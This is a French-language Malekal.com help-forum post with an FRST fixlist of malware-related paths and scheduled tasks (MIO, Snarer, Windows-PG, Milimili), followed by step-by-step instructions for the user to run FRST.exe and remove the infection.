2017-05-04 00:41 - 2017-05-04 00:41 - 00000000 ____D C:\Users\MONLOGIN\AppData\Roaming\Firefox
2017-05-04 00:41 - 2017-05-04 00:41 - 00000000 _____ C:\Windows\SysWOW64\1111111
2017-05-04 00:40 - 2017-05-04 01:51 - 00000000 _____ C:\Users\Public\Documents\report.dat
2017-05-04 00:40 - 2017-05-04 01:42 - 00000166 _____ C:\Users\Public\Documents\temp.dat
2017-05-04 00:40 - 2017-05-04 00:41 - 00000000 ____D C:\Program Files (x86)\Firefox
2017-05-04 00:38 - 2017-05-04 00:40 - 00000000 ____D C:\Users\MONLOGIN\AppData\Local\SNAREA
2017-05-04 00:38 - 2017-05-04 00:38 - 00000000 ____D C:\Program Files (x86)\MIO
2017-05-04 00:38 - 2017-05-04 00:38 - 00000000 ____D C:\Program Files (x86)\{8C0DFCBD-1B58-4B33-B511-927743AB18A3}
2017-05-03 12:38 - 2017-05-03 12:38 - 00000000 ____D C:\Program Files\MK
2017-05-03 12:38 - 2017-05-03 12:38 - 00000000 ____D C:\Program Files (x86)\{7A6E5168-E3F7-4344-8966-2D16FFAA5CF6}
2017-05-01 16:08 - 2017-05-01 16:08 - 00000000 ____D C:\Users\MONLOGIN\AppData\Local\Tempzxpsign45e6d9bd7c651334
2017-05-01 16:08 - 2017-05-01 16:08 - 00000000 ____D C:\Users\MONLOGIN\AppData\Local\Tempzxpsign3986a24a7cb0cbd7
2017-04-29 00:09 - 2017-05-03 22:44 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2017-04-29 00:09 - 2017-05-03 18:52 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2017-04-28 23:43 - 2017-05-04 00:42 - 00003580 _____ C:\Windows\System32\Tasks\Windows-PG
2017-04-28 23:43 - 2017-05-04 00:39 - 00000000 ____D C:\Users\MONLOGIN\AppData\Local\Kitty
2017-04-28 23:33 - 2017-05-04 00:38 - 00003670 _____ C:\Windows\System32\Tasks\Milimili
2017-04-28 23:33 - 2017-05-04 00:38 - 00000000 ____D C:\Users\MONLOGIN\AppData\Roaming\WinSAPSvc
2017-04-28 23:33 - 2017-05-01 01:59 - 00000000 ____D C:\Alitkojck
2017-04-28 23:33 - 2017-04-28 23:33 - 00000000 ____D C:\Users\MONLOGIN\AppData\Local\SNARE
2017-04-27 12:52 - 2017-05-04 00:40 - 00000000 _____ C:\Windows\SysWOW64\11
2017-04-26 19:40 - 2017-04-26 19:40 - 00000000 ____D C:\Windows\psgo
C:\Program Files\7JLTZ4K8OK
C:\Program Files\C4LH9FEELE
EmptyTemp:

Menu Fichier / Enregistrer-sous
Place toi sur le bureau.
Dans le champs en bas, nom du fichier mets : fixlist.txt
Clic sur Enregistrer - cela va créer un fichier fixlist.txt sur le bureau.
Ferme toutes les applications, y compris ton navigateur
Double-clique sur FRST.exe
Sous Vista, Windows 7, 8,10, etc.... il faut lancer le fichier par clic-droit ➫ Exécuter en tant qu'administrateur
Sur le menu principal, clique une seule fois sur Corriger/Fix et patiente le temps de la correction

Un redémarrage peut être nécessaire (pas obligatoire).
L'outil va créer un rapport de correction Fixlog.txt. Poste ce rapport dans ta réponse avec ton commentaire si c'est mieux !

Malekal.com forum

Malware MIO.exe, Snarer.msi, CPK.exe, QQBrowser...

Malware MIO.exe, Snarer.msi, CPK.exe, QQBrowser...

Re: Malware MIO.exe, Snarer.msi, CPK.exe, QQBrowser...